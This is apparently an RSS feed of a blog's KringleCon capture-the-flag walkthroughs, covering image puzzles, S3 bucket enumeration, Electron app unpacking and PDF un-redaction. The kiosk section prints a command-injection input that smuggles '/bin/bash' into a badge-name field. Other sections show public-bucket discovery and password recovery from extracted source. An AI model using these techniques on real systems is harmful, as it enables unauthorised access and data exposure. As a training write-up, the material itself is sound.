<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>FLRNKS</title><link>https://flrnks.netlify.app/</link><atom:link href="https://flrnks.netlify.app/index.xml" rel="self" type="application/rss+xml"/><description>FLRNKS</description><generator>Source Themes Academic (https://sourcethemes.com/academic/)</generator><language>en-us</language><copyright>© 2024</copyright><image><url>https://flrnks.netlify.app/images/icon_hu0b7a4cb9992c9ac0e91bd28ffd38dd00_9727_512x512_fill_lanczos_center_2.png</url><title>FLRNKS</title><link>https://flrnks.netlify.app/</link></image><item><title>Uncover Santa's Gift List</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective1/</link><pubDate>Tue, 22 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective1/</guid><description>&lt;p>&lt;img src="../images/obj1/starting-point.png" alt="Starting Point">&lt;/p>
&lt;p>After a long and snowy journey I&amp;rsquo;ve finally arrived at the North Pole to attend KringleCon III! I talk to &lt;code>Jingle Ringford&lt;/code> to orient myself:&lt;/p>
&lt;blockquote>
&lt;p>Welcome! Hop in the gondola to take a ride up the mountain to Exit 19: Santa&amp;rsquo;s castle!
Santa asked me to design the new badge, and he wanted it to look really cold - like it was frosty.
Click your badge (the snowflake in the center of your avatar) to read your objectives.
If you&amp;rsquo;d like to chat with the community, join us on
&lt;a href="https://discord.gg/Wbmx92rWW3" target="_blank" rel="noopener">Discord&lt;/a>!
We have specially appointed Kringle Koncierges as helpers; you can hit them up for help in the #general channel!
If you get a minute, check out Ed Skoudis&amp;rsquo;
&lt;a href="https://www.youtube.com/watch?v=8e0SZrbWFuU" target="_blank" rel="noopener">official intro to the con&lt;/a>!
You can&amp;rsquo;t wait to get to KringleCon, but first you should check your badge, which already has your first objective ready:&lt;/p>
&lt;/blockquote>
&lt;p>I see the big billboard at the top left, near the main road. Click
&lt;a href="https://2020.kringlecon.com/textures/billboard.png" target="_blank" rel="noopener">HERE&lt;/a> to open it in a new window and download it for closer inspection.&lt;/p>
&lt;p>&lt;img src="../images/obj1/objective1.png" alt="Objective1">&lt;/p>
&lt;p>Some hints from the badge to get started with the image manipulation:&lt;/p>
&lt;ul>
&lt;li>There are
&lt;a href="https://www.photopea.com/" target="_blank" rel="noopener">tools&lt;/a> out there that could help Filter the Distortion that is this Twirl.&lt;/li>
&lt;li>Make sure you Lasso the correct twirly area.&lt;/li>
&lt;/ul>
&lt;p>It seems that to recover Santa&amp;rsquo;s gift to
&lt;a href="https://twitter.com/joswr1ght?lang=en" target="_blank" rel="noopener">Josh Wright&lt;/a> I will need to do a bit of image manipulation to un-twirl the photo&amp;rsquo;s section which contains the list.&lt;/p>
&lt;p>Luckily, the hints link to an online tool that can do this quite easily.&lt;/p>
&lt;p>After fiddling around with it for a few minutes, I managed to un-twirl it enough to read it: &lt;code>proxmark&lt;/code>&lt;/p>
&lt;p>&lt;img src="../images/obj1/proxmark.png" alt="Proxmark">&lt;/p>
&lt;p>
&lt;a href="https://proxmark.com/" target="_blank" rel="noopener">Click&lt;/a> to learn more about what &lt;code>proxmark&lt;/code> is, it may be useful later on &amp;hellip;&lt;/p>
&lt;p>On to the next objective! 😎&lt;/p></description></item><item><title>Talk to Santa in the Quad</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective0/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective0/</guid><description>&lt;h2 id="greetings-from-santa">Greetings from Santa&lt;/h2>
&lt;p>This is the very beginning of your journey at the &lt;strong>Elf University&lt;/strong>. You&amp;rsquo;ve just arrived at the North Pole by train, and your starting position looks something like this:&lt;/p>
&lt;p>&lt;img src="../images/obj0-start.png" alt="Starting position">&lt;/p>
&lt;p>You can interact with the characters by clicking on them (repeatedly clicking will reveal their full message), and you can also interact with certain objects that will open either a command-line terminal or a full website in a frame. If you click on Santa a few times he provides the below greeting:&lt;/p>
&lt;blockquote>
&lt;p>Welcome to the North Pole and KringleCon 2!
Last year, KringleCon hosted over 17,500 attendees and my castle got a little crowded.
We moved the event to Elf University (Elf U for short), the North Pole’s largest venue.
Please feel free to explore, watch talks, and enjoy the con!&lt;/p>
&lt;/blockquote>
&lt;p>As you may notice, you are not alone at the North Pole. One of the coolest things about the challenge is that you get to interact with like-minded people through the game interface. Whenever you feel lost, you should ask in the chat for some guidance. Just be sure not to ask for direct solutions, because that would ruin all the fun, wouldn&amp;rsquo;t it? :)&lt;/p>
&lt;p>Another great feature is the personal badge on your avatar, which you can click at any point to get useful information on your objectives and accomplishments.&lt;/p>
&lt;p>&lt;img src="../images/obj0-badge.png" alt="Starting position">&lt;/p>
&lt;h2 id="get-outta-here">Get outta here&lt;/h2>
&lt;p>In this zeroth(?!) objective you need to find Santa in another room called &lt;strong>The Quad&lt;/strong>, so your main job is to find your way out of the &lt;strong>Train Station&lt;/strong>. Navigation works either via mouse clicks or via the arrow keys on your keyboard. To get to &lt;strong>The Quad&lt;/strong>, simply keep going upwards until you find yourself in another space.&lt;/p>
&lt;p>&lt;img src="../images/obj0-quad.png" alt="Santa in The Quad">&lt;/p>
&lt;p>Once you&amp;rsquo;ve found Santa, who is quite hard to miss since he stands right in the middle of &lt;strong>The Quad&lt;/strong>, you can click on him a few times to complete Objective 0 and receive further instructions:&lt;/p>
&lt;blockquote>
&lt;p>This is a little embarrassing, but I need your help.
Our KringleCon turtle dove mascots are missing!
They probably just wandered off.
Can you please help find them?
To help you search for them and get acquainted with KringleCon, I’ve created some objectives for you. You can see them in your badge.
Where&amp;rsquo;s your badge? Oh! It&amp;rsquo;s that big, circle emblem on your chest - give it a tap!
We made them in two flavors - one for our new guests, and one for those who&amp;rsquo;ve attended both KringleCons.
After you find the Turtle Doves and complete objectives 2-5, please come back and let me know.
Not sure where to start? Try hopping around campus and talking to some elves.
If you help my elves with some quicker problems, they&amp;rsquo;ll probably remember clues for the objectives.&lt;/p>
&lt;/blockquote></description></item><item><title>Investigate S3 Bucket</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective2/</link><pubDate>Tue, 22 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective2/</guid><description>&lt;p>&lt;img src="../images/obj2/objective2.png" alt="Objective2">&lt;/p>
&lt;p>After recovering Santa&amp;rsquo;s gift list, I take the snow lift and arrive at Kringle Castle&amp;rsquo;s &lt;strong>Front Lawn&lt;/strong>. Here I find a few characters, including Santa himself, who greets me right away:&lt;/p>
&lt;p>&lt;img src="../images/obj2/front-lawn-santa.png" alt="Front Lawn Greeting">&lt;/p>
&lt;blockquote>
&lt;p>Hello and welcome to the North Pole!
We’re super excited about this year’s KringleCon 3: French Hens.
My elves have been working all year to upgrade the castle.
It was a HUGE construction project, and we’ve nearly completed it.
Please pardon the remaining construction dust around the castle and enjoy yourselves!&lt;/p>
&lt;/blockquote>
&lt;p>The 2nd objective in the badge instructs me to investigate some S3 bucket used at the North Pole. For hints, I talk with &lt;code>Shinny Upatree&lt;/code> in the bottom right corner. But first, he asks for a favor with the Kringle Kiosk terminal:&lt;/p>
&lt;p>&lt;img src="../images/obj2/shinny-upatree.png" alt="Shinny Upatree">&lt;/p>
&lt;blockquote>
&lt;p>Hiya hiya - I&amp;rsquo;m Shinny Upatree!
Check out this cool KringleCon kiosk!
You can get a map of the castle, learn about where the elves are, and get your own badge printed right on-screen!
Be careful with that last one though. I heard someone say it&amp;rsquo;s &amp;ldquo;ingestible.&amp;rdquo; Or something&amp;hellip;
Do you think you could check and see if there is an issue?&lt;/p>
&lt;/blockquote>
&lt;p>The &lt;strong>Kringle Kiosk&lt;/strong> challenge involves escaping from the application via a
&lt;a href="https://owasp.org/www-community/attacks/Command_Injection" target="_blank" rel="noopener">Command Injection&lt;/a>:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>Welcome to our castle, we&lt;span class="s1">&amp;#39;re so glad to have you with us!
&lt;/span>&lt;span class="ln">2&lt;/span>&lt;span class="s1">Come and browse the kiosk; though our app&amp;#39;&lt;/span>s a bit suspicious.
&lt;span class="ln">3&lt;/span>Poke around, try running bash, please try to come discover,
&lt;span class="ln">4&lt;/span>Need our devs who made our app pull/patch to &lt;span class="nb">help&lt;/span> recover?
&lt;span class="ln">5&lt;/span>
&lt;span class="hl">&lt;span class="ln">6&lt;/span>Escape the menu by launching /bin/bash &lt;span class="s">&amp;lt;&amp;lt; THE T&lt;/span>ASK!
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Once I open the Kiosk and hit enter, I see a list of menu items to choose from:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln"> 1&lt;/span>~~~~~~~~~~~~~~~~~~~~~~~~~~~~
&lt;span class="ln"> 2&lt;/span> Welcome to the North Pole!
&lt;span class="ln"> 3&lt;/span>~~~~~~~~~~~~~~~~~~~~~~~~~~~~
&lt;span class="ln"> 4&lt;/span>1. Map
&lt;span class="ln"> 5&lt;/span>2. Code of Conduct and Terms of Use
&lt;span class="ln"> 6&lt;/span>3. Directory
&lt;span class="hl">&lt;span class="ln"> 7&lt;/span>4. Print Name Badge
&lt;/span>&lt;span class="ln"> 8&lt;/span>5. Exit
&lt;span class="ln"> 9&lt;/span>
&lt;span class="ln">10&lt;/span>Please &lt;span class="k">select&lt;/span> an item from the menu by entering a single number.
&lt;span class="ln">11&lt;/span>Anything &lt;span class="k">else&lt;/span> might have ... unintended consequences.
&lt;span class="ln">12&lt;/span>Enter choice &lt;span class="o">[&lt;/span>&lt;span class="m">1&lt;/span> - 5&lt;span class="o">]&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Keeping in mind Shinny&amp;rsquo;s advice about &lt;strong>option 4&lt;/strong>, which is used to print badges, I chose that option, as it is likely the one with the &lt;strong>Command Injection&lt;/strong> flaw. When selected, it even shows a warning about special characters. Let&amp;rsquo;s see how it handles my username plus some special characters: &lt;code>FLRNKS; /bin/bash&lt;/code>&lt;/p>
&lt;p>&lt;img src="../images/obj2/hello-from-bash.png" alt="Command Injection in Kringle Kiosk">&lt;/p>
&lt;p>Now that wasn&amp;rsquo;t too hard! I then talk to Shinny to get those hints he promised:&lt;/p>
&lt;blockquote>
&lt;p>Golly - wow! You sure found the flaw for us!
Say, we&amp;rsquo;ve been having an issue with an Amazon S3 bucket.
Do you think you could help find Santa&amp;rsquo;s package file?
Jeepers, it seems there&amp;rsquo;s always a leaky bucket in the news. You&amp;rsquo;d think we could find our own files!
Digininja has a great guide, if you&amp;rsquo;re new to S3 searching.
He even released a tool for the task - what a guy!
The package wrapper Santa used is reversible, but it may take you some trying.
Good luck, and thanks for pitching in!&lt;/p>
&lt;/blockquote>
&lt;p>Some hints also from the badge:&lt;/p>
&lt;ul>
&lt;li>It seems there&amp;rsquo;s a new story every week about data exposed in unprotected
&lt;a href="https://www.computerweekly.com/news/252491842/Leaky-AWS-S3-bucket-once-again-at-centre-of-data-breach" target="_blank" rel="noopener">AWS S3 buckets&lt;/a>&lt;/li>
&lt;li>Find Santa&amp;rsquo;s package file in S3, see Josh Wright&amp;rsquo;s
&lt;a href="https://www.youtube.com/watch?v=t4UzXx5JHk0" target="_blank" rel="noopener">talk&lt;/a> for tips&lt;/li>
&lt;li>Robin Wood wrote up a
&lt;a href="https://digi.ninja/blog/whats_in_amazons_buckets.php" target="_blank" rel="noopener">guide&lt;/a> about finding these open S3 buckets&lt;/li>
&lt;li>He even wrote a
&lt;a href="https://digi.ninja/projects/bucket_finder.php" target="_blank" rel="noopener">tool&lt;/a> to search for unprotected buckets&lt;/li>
&lt;li>Santa&amp;rsquo;s Wrapper3000 is pretty buggy. It uses several compression tools, binary to ASCII conversion, and other tools to wrap packages.&lt;/li>
&lt;/ul>
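&lt;p>The last hint describes the wrapper&amp;rsquo;s recipe: a stack of compression layers plus a binary-to-ASCII step. A reduced local sketch of that idea, with &lt;code>gzip&lt;/code> and &lt;code>base64&lt;/code> standing in for whatever tools Santa actually used:&lt;/p>

```shell
cd "$(mktemp -d)"   # work in a scratch directory

# Wrap: compress, bundle, then convert the binary result to ASCII.
echo 'hello wrapper' > package.txt
gzip package.txt                           # -> package.txt.gz
tar cf package.txt.gz.tar package.txt.gz   # bundle the compressed file
base64 package.txt.gz.tar > package        # ASCII outer layer, like the S3 object

# Unwrap: peel the layers off in reverse order.
base64 -d package > unwrapped.tar
tar xf unwrapped.tar        # restores package.txt.gz
gunzip -f package.txt.gz    # restores package.txt
cat package.txt             # -> hello wrapper
```

&lt;p>The real package nests more layers, but the unwrap principle is the same: undo each step in reverse order.&lt;/p>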
&lt;p>To get started, I click on the terminal to the right of Shinny, which brings up a new CLI:&lt;/p>
&lt;p>&lt;img src="../images/obj2/wrapper.png" alt="Wrapper3000 Welcome">&lt;/p>
&lt;p>On the terminal&amp;rsquo;s file system there is a folder called &lt;code>bucket_finder&lt;/code> that contains a Ruby script and a &lt;strong>wordlist&lt;/strong>. The script iterates over each line of the wordlist and tests whether an S3 bucket with that name exists and whether it&amp;rsquo;s public. With the &lt;code>--download&lt;/code> flag, it can also download all available objects when a public bucket is found.&lt;/p>
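&lt;p>Conceptually, the script does something like the following for each entry. This is an offline sketch: the probe URL is only printed here, whereas the real tool issues an HTTP request (e.g. via &lt;code>curl&lt;/code>) against it:&lt;/p>

```shell
cd "$(mktemp -d)"   # scratch directory for the demo wordlist

# Candidate bucket names, one per line (the real wordlist ships with the tool).
printf '%s\n' Wrapper3000 wrapper3000 > wordlist

# For every candidate, bucket_finder requests http://s3.amazonaws.com/<name>
# and reports whether the bucket exists and whether it is publicly listable.
while read -r name; do
  echo "probing http://s3.amazonaws.com/$name"
done < wordlist
```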
&lt;p>The &lt;strong>wordlist&lt;/strong> initially contains only 3 words, and none of them maps to the bucket I need. Part of the challenge is to come up with new entries for the &lt;strong>wordlist&lt;/strong> in order to find the bucket. While thinking of possibilities, I remembered the terminal MOTD, which had a brightly emphasized word &lt;code>Wrapper3000&lt;/code>, so I added two variants of it to the list: first as it was, then with a lowercase &lt;code>W&lt;/code>, remembering that S3 bucket names are case-sensitive. Lo and behold, the lowercase version was the name of the bucket that held the &lt;code>package&lt;/code> file I needed:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>elf@6baea2e4fddd:~/bucket_finder$ cat wordlist
&lt;span class="ln">2&lt;/span>...
&lt;span class="ln">3&lt;/span>Wrapper3000
&lt;span class="ln">4&lt;/span>wrapper3000
&lt;span class="ln">5&lt;/span>elf@6baea2e4fddd:~/bucket_finder$ ./bucket_finder.rb wordlist
&lt;span class="ln">6&lt;/span>...
&lt;span class="ln">7&lt;/span>Bucket does not exist: Wrapper3000
&lt;span class="ln">8&lt;/span>Bucket Found: wrapper3000 &lt;span class="o">(&lt;/span> http://s3.amazonaws.com/wrapper3000 &lt;span class="o">)&lt;/span>
&lt;span class="hl">&lt;span class="ln">9&lt;/span> &amp;lt;Public&amp;gt; http://s3.amazonaws.com/wrapper3000/package &amp;lt;&amp;lt; THE FILE WE NEED!
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Running the Ruby script again with the &lt;code>--download&lt;/code> flag cloned the bucket into a subdirectory called &lt;strong>wrapper3000&lt;/strong>. Next I navigated to this directory and started inspecting the contents of &lt;code>package&lt;/code>:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ file package
&lt;span class="ln">2&lt;/span>package: ASCII text, with very long lines
&lt;span class="ln">3&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ cat package
&lt;span class="hl">&lt;span class="ln">4&lt;/span>UEsDBAoAAAAAAIAwhFEbRT8anwEAAJ8BAAAcABwAcGFja2FnZS50eHQuWi54ei54eGQudGFyLmJ6MlVUCQADoBfKX6AXyl91eAsAAQT2AQAABBQAAABCWmg5MUFZJlNZ2ktivwABHv+Q3hASgGSn//AvBxDwf/xe0gQAAAgwAVmkYRTKe1PVM9U0ekMg2poAAAGgPUPUGqehhCMSgaBoAD1NNAAAAyEmJpR5QGg0bSPU/VA0eo9IaHqBkxw2YZK2NUASOegDIzwMXMHBCFACgIEvQ2Jrg8V50tDjh61Pt3Q8CmgpFFunc1Ipui+SqsYB04M/gWKKc0Vs2DXkzeJmiktINqjo3JjKAA4dLgLtPN15oADLe80tnfLGXhIWaJMiEeSX992uxodRJ6EAzIFzqSbWtnNqCTEDML9AK7HHSzyyBYKwCFBVJh17T636a6YgyjX0eE0IsCbjcBkRPgkKz6q0okb1sWicMaky2Mgsqw2nUm5ayPHUeIktnBIvkiUWxYEiRs5nFOM8MTk8SitV7lcxOKst2QedSxZ851ceDQexsLsJ3C89Z/gQ6Xn6KBKqFsKyTkaqO+1FgmImtHKoJkMctd2B9JkcwvMr+hWIEcIQjAZGhSKYNPxHJFqJ3t32Vjgn/OGdQJiIHv4u5IpwoSG0lsV+UEsBAh4DCgAAAAAAgDCEURtFPxqfAQAAnwEAABwAGAAAAAAAAAAAAKSBAAAAAHBhY2thZ2UudHh0LloueHoueHhkLnRhci5iejJVVAUAA6AXyl91eAsAAQT2AQAABBQAAABQSwUGAAAAAAEAAQBiAAAA9QEAAAAA
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Right away it looked like base64-encoded text, so I ran it through &lt;code>base64 -d&lt;/code>. Then I checked what kind of file was recovered, and it was in fact a compressed ZIP file:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ cat package &lt;span class="p">|&lt;/span> base64 -d &amp;gt; package-decoded
&lt;span class="ln">2&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ file package-decoded
&lt;span class="hl">&lt;span class="ln">3&lt;/span>package-decoded: Zip archive data, at least v1.0 to extract
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Next I used &lt;code>unzip&lt;/code> to recover the file that was hiding in this ZIP. The resulting file had a rather long list of extensions which suggested there was more unwrapping to do:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ unzip package-decoded
&lt;span class="ln">2&lt;/span>Archive: package-decoded extracting: package.txt.Z.xz.xxd.tar.bz2
&lt;span class="ln">3&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ file package.txt.Z.xz.xxd.tar.bz2
&lt;span class="hl">&lt;span class="ln">4&lt;/span>package.txt.Z.xz.xxd.tar.bz2: bzip2 compressed data, block &lt;span class="nv">size&lt;/span> &lt;span class="o">=&lt;/span> 900k
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Next, I started peeling back each layer of encoding/compression in reverse order to finally reveal the solution to this objective:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ bunzip2 package.txt.Z.xz.xxd.tar.bz2
&lt;span class="ln">2&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ tar xopf package.txt.Z.xz.xxd.tar
&lt;span class="ln">3&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ xxd -r package.txt.Z.xz.xxd &amp;gt; package.txt.Z.xz
&lt;span class="ln">4&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ unxz package.txt.Z.xz
&lt;span class="ln">5&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ uncompress package.txt.Z
&lt;span class="ln">6&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ cat package.txt
&lt;span class="hl">&lt;span class="ln">7&lt;/span>North Pole: The Frostiest Place on Earth
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Brrrrrr &amp;hellip; 🥶 On to the next objective!&lt;/p></description></item><item><title>Find the Turtle Doves</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective1/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective1/</guid><description>&lt;h2 id="where-the-doves-at">Where the doves at?&lt;/h2>
&lt;p>After talking with Santa in &lt;strong>The Quad&lt;/strong> you get your new objective: &lt;strong>Find the Turtle Doves&lt;/strong>. They are the official mascots of this year&amp;rsquo;s challenge, and you need to find them before it&amp;rsquo;s too late!&lt;/p>
&lt;p>To be sure, there is not much else to do except go around and explore until you find them. Once you do, be sure to click on the text over their heads to complete the objective! &lt;strong>Hint&lt;/strong>: they are warming up somewhere near a fireplace&amp;hellip; :)&lt;/p>
&lt;p>&lt;img src="../images/obj1-doves.png" alt="Doves by the fireplace">&lt;/p>
&lt;p>You get some valuable further clues once you find them and click them a few times:&lt;/p>
&lt;blockquote>
&lt;p>Hoot Hooot?
&amp;hellip;
Hoot Hooot?
&amp;hellip;
Hoot Hooot?
&amp;hellip;
Hoot Hooot?&lt;/p>
&lt;/blockquote>
&lt;p>But jokes aside, at this point you should be familiar with the inner functioning of the challenge universe at the North Pole. Now you are ready to start working on the real stuff.&lt;/p></description></item><item><title>Point-of-Sale Password Recovery</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective3/</link><pubDate>Tue, 22 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective3/</guid><description>&lt;p>&lt;img src="../images/obj3/objective3.png" alt="Objective3">&lt;/p>
&lt;p>After solving the S3 bucket challenge, this new objective leads me to the courtyard where I meet up with &lt;code>Sugarplum Mary&lt;/code> to help her recover a lost password for the PoS terminal:&lt;/p>
&lt;p>&lt;img src="../images/obj3/sugarplum-mary.png" alt="Sugarplum Mary">&lt;/p>
&lt;blockquote>
&lt;p>Sugarplum Mary? That&amp;rsquo;s me!
I was just playing with this here terminal and learning some Linux!
It&amp;rsquo;s a great intro to the Bash terminal.
If you get stuck at any point, type hintme to get a nudge!
Can you make it to the end?&lt;/p>
&lt;/blockquote>
&lt;p>This terminal was a quick refresher to hone your Linux terminal skillz. I used the below list of commands to solve it:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln"> 1&lt;/span>ls
&lt;span class="ln"> 2&lt;/span>cat munchkin_19315479765589239
&lt;span class="ln"> 3&lt;/span>rm munchkin_19315479765589239
&lt;span class="ln"> 4&lt;/span>&lt;span class="nb">pwd&lt;/span>
&lt;span class="ln"> 5&lt;/span>ls -la &lt;span class="p">|&lt;/span> grep munchkin
&lt;span class="ln"> 6&lt;/span>cat .bash_history &lt;span class="p">|&lt;/span> grep munchkin
&lt;span class="ln"> 7&lt;/span>env &lt;span class="p">|&lt;/span> grep munchkin
&lt;span class="ln"> 8&lt;/span>&lt;span class="nb">cd&lt;/span> workshop
&lt;span class="ln"> 9&lt;/span>find . -type f -name &lt;span class="s2">&amp;#34;toolbox*.txt&amp;#34;&lt;/span> &lt;span class="p">|&lt;/span> xargs grep -i munchkin
&lt;span class="ln">10&lt;/span>chmod +x lollipop_engine
&lt;span class="ln">11&lt;/span>./lollipop_engine
&lt;span class="ln">12&lt;/span>&lt;span class="nb">cd&lt;/span> electrical/
&lt;span class="ln">13&lt;/span>mv blown_fuse0 fuse0
&lt;span class="ln">14&lt;/span>ln -s fuse0 fuse1
&lt;span class="ln">15&lt;/span>cp fuse1 fuse2
&lt;span class="ln">16&lt;/span>&lt;span class="nb">echo&lt;/span> &lt;span class="s2">&amp;#34;MUNCHKIN_REPELLENT&amp;#34;&lt;/span> &amp;gt;&amp;gt; fuse2
&lt;span class="ln">17&lt;/span>&lt;span class="nb">cd&lt;/span> /opt/munchkin_den/
&lt;span class="ln">18&lt;/span>find .
&lt;span class="ln">19&lt;/span>find . -user munchkin
&lt;span class="ln">20&lt;/span>find . -size +108k -size -110k
&lt;span class="ln">21&lt;/span>ps a
&lt;span class="ln">22&lt;/span>netstat -l
&lt;span class="ln">23&lt;/span>curl http://0.0.0.0:54321
&lt;span class="ln">24&lt;/span>&lt;span class="nb">kill&lt;/span> -s &lt;span class="m">9&lt;/span> &lt;span class="m">11555&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>The interactive nature of the whole terminal reminded me of the Mini NetWars challenges from earlier this year, which was a nice feeling! Talking to Mary again revealed the below hints about the main objective:&lt;/p>
&lt;blockquote>
&lt;p>You did it - great! Maybe you can help me configure my postfix mail server on Gentoo!
Just kidding!
Hey, wouldja&amp;rsquo; mind helping me get into my point-of-sale terminal?
Just kidding!
It&amp;rsquo;s down, and we kinda&amp;rsquo; need it running..
Problem is: it is asking for a password. I never set one!
Can you help me figure out what it is so I can get set up?
Shinny says this might be an Electron application.
I hear there&amp;rsquo;s a way to extract an ASAR file from the binary, but I haven&amp;rsquo;t looked into it yet.&lt;/p>
&lt;/blockquote>
&lt;p>&amp;hellip; and the hints from the badge:&lt;/p>
&lt;ul>
&lt;li>It&amp;rsquo;s possible to extract the source code from an
&lt;a href="https://www.electronjs.org/" target="_blank" rel="noopener">Electron&lt;/a> app.&lt;/li>
&lt;li>There are
&lt;a href="https://www.npmjs.com/package/asar" target="_blank" rel="noopener">tools&lt;/a> and
&lt;a href="https://medium.com/how-to-electron/how-to-get-source-code-of-any-electron-application-cbb5c7726c37" target="_blank" rel="noopener">guides&lt;/a> explaining how to extract ASAR from Electron apps.&lt;/li>
&lt;li>The PoS firmware is available for download
&lt;a href="https://download.holidayhackchallenge.com/2020/santa-shop/santa-shop.exe" target="_blank" rel="noopener">HERE&lt;/a> as a 47 MB .exe file&lt;/li>
&lt;/ul>
&lt;p>To get started, I spun up a Windows VM on my MacBook and downloaded the exe inside this machine. I also installed
&lt;a href="https://www.7-zip.org/" target="_blank" rel="noopener">7zip&lt;/a> to help unpack the EXE file, with the goal of recovering the &lt;strong>asar&lt;/strong> file which contains the source code for the app. After opening the exe in 7zip, I found the &lt;code>app.asar&lt;/code> in the &lt;strong>resources&lt;/strong> subdirectory, which I extracted to my working folder:&lt;/p>
&lt;p>&lt;img src="../images/obj3/asar.png" alt="asar in resources">&lt;/p>
&lt;p>Next, in the Windows Command Prompt, I installed NPM and the &lt;code>asar&lt;/code> packaging tool to unpack the recovered &lt;strong>app.asar&lt;/strong> file:&lt;/p>
&lt;p>&lt;img src="../images/obj3/asar-extract.png" alt="recover soruce code">&lt;/p>
&lt;p>This operation recovered several files; reading the README pointed me directly to &lt;code>main.js&lt;/code>, which had the password right at the top of the file:&lt;/p>
&lt;p>&lt;img src="../images/obj3/santapass.png" alt="main.js">&lt;/p>
&lt;p>On to the next one! 😎&lt;/p></description></item><item><title>Unredact Threatening Document</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective2/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective2/</guid><description>&lt;h2 id="un-redact-that-thing">Un-redact that thing!&lt;/h2>
&lt;p>The instructions from the badge:&lt;/p>
&lt;blockquote>
&lt;p>Someone sent a threatening letter to Elf University.
What is the first word in ALL CAPS in the subject line of the letter?
Please find the letter in the Quad.&lt;/p>
&lt;/blockquote>
&lt;p>Much like finding the Turtle Doves, there is not much else to do but explore the environment with careful attention to detail, such as documents lying around &amp;hellip; until you find it:&lt;/p>
&lt;p>&lt;img src="../images/obj2-doc.png" alt="Demanding redacted document">&lt;/p>
&lt;p>When you click the piece of paper in the corner, you will be redirected to a URL which loads a PDF document with some redacted parts.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">https://downloads.elfu.org/LetterToElfUPersonnel.pdf
&lt;/code>&lt;/pre>&lt;/div>&lt;p>In order to read the redacted part, simply hit Ctrl+A or use the mouse to select all the text, then copy-paste it into an empty text editor to reveal the full, un-redacted contents.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-text" data-lang="text">Date: February 28, 2019
To the Administration, Faculty, and Staff of Elf University
17 Christmas Tree Lane
North Pole
From: A Concerned and Aggrieved Character
Subject: DEMAND: Spread Holiday Cheer to Other Holidays and Mythical Characters… OR
ELSE!
Attention All Elf University Personnel,
It remains a constant source of frustration that Elf University and the entire operation at the
North Pole focuses exclusively on Mr. S. Claus and his year-end holiday spree. We URGE
you to consider lending your considerable resources and expertise in providing merriment,
cheer, toys, candy, and much more to other holidays year-round, as well as to other mythical
characters.
For centuries, we have expressed our frustration at your lack of willingness to spread your
cheer beyond the inaptly-called “Holiday Season.” There are many other perfectly fine
holidays and mythical characters that need your direct support year-round.
If you do not accede to our demands, we will be forced to take matters into our own hands.
We do not make this threat lightly. You have less than six months to act demonstrably.
Sincerely,
--A Concerned and Aggrieved Character
Confidential
